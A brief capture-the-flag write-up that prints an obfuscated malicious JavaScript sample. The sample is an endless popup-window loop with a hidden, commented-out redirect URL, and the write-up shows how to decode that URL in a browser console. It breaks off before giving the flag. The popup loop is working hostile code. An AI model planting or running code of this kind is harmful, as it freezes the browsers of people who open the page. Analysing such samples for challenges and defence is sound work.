Malicious html file (javascript) which contains:
var a = ['ps:','cte','5df','se_','toS','ing','tri','sub','lac','ryt','d}.','cod','pro','_no','ran','ing','dom','str','ete','rep'];function abc(def) { popupWindow = window.open( def,'popUpWindow','height=666,width=666,left=666,top=666') }(function(c, d) {var e = function(f) {while (--f) {c['push'](c['shift']());}};e(++d);}(a, 0xa8));var b = function(c, d) {c = c - 0x0;var e = a[c];return e;};var c = 'htt' + b('0xc') + '//t' + b('0x1') + b('0xe') + 'xc-' + 'rWP' + 'I';var d = '{Oh' + b('0x5') + b('0xf') + b('0x4') + b('0x3') + b('0x7') + '_d';var e = b('0xa') + b('0xd') + b('0x2') + 'net' + '/';var f = Math[b('0x6') + b('0x8')]()[b('0x10') + b('0x12') + 'ng'](0x6)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x10)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);var g = Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math[b('0x6') + b('0x8')]()['toS' + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);/*location[b('0xb') + b('0x0') + 'e'](c + d + e + '?' + f + '=' + g);*/for(var i=1;i===i;i++){abc(self.location,'_blank');}
We can just check what it is trying to redirect to by copying everything up until the redirect into chrome's dev tools console.
since the comment has location with all the variables concatenated, let's see what it contains..
c + d + e + '?' + f + '=' + g
the flag is in the url that it spits out: